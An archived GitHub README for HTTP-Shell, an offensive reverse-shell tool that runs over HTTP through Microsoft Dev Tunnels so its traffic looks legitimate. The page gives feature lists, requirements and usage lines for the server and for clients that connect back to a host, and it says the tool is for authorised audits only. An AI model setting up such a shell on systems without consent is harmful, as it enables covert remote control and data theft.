GitHub - JoelGMSec/HTTP-Shell: MultiPlatform HTTP Reverse
Shell
By JoelGMSec
Archived: 2026-04-05 16:40:45 UTC
HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse
connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with
Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.
This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of
uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic
reconnection, movement between directories and supports sudo (or sudo su) on Linux-based OS.
Requirements
Python 3 for Server (or Docker - see Usage section)
Install requirements.txt
Bash for Linux Client
PowerShell 2.0 or greater for Windows Client
Download
https://github.com/JoelGMSec/HTTP-Shell
Page 1 of 3

It is recommended to clone the complete repository or download the zip file. You can do this by running the
following command:
git clone https://github.com/JoelGMSec/HTTP-Shell
Usage
# Server
 _ _ _____ _____ ____ ____ _ _ _
 | | | |_ _|_ _| _ \ / ___|| |__ ___| | |
 | |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | |
 | _ | | | | | | __/_____|__) | | | | __/ | |
 |_| |_| |_| |_| |_| |____/|_| |_|\___|_|_|
 
 ---------------- by @JoelGMSec -----------------
[!] Usage: HTTP-Server.py [PORT]
# Linux CLI
[!] Usage: ./HTTP-Client.sh -c [HOST:PORT] -s [SLEEP] (optional)
# Windows CLI
[!] Usage: .\HTTP-Client.ps1 -c [HOST:PORT] -s [SLEEP] (optional)
If you wish to run server in a Docker container:
docker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main
docker run -it --rm -p 8080:8080 --name http-shell http-shell
The detailed guide of use can be found at the following link:
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
License
This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.
Credits and Acknowledgments
https://github.com/JoelGMSec/HTTP-Shell
Page 2 of 3

Original idea and some code by Héctor de Armas Padrón (@3v4si0n)
This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).
Contact
This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or
security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible
damage caused by it.
For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.
Support
You can support my work buying me a coffee:
Source: https://github.com/JoelGMSec/HTTP-Shell
https://github.com/JoelGMSec/HTTP-Shell
Page 3 of 3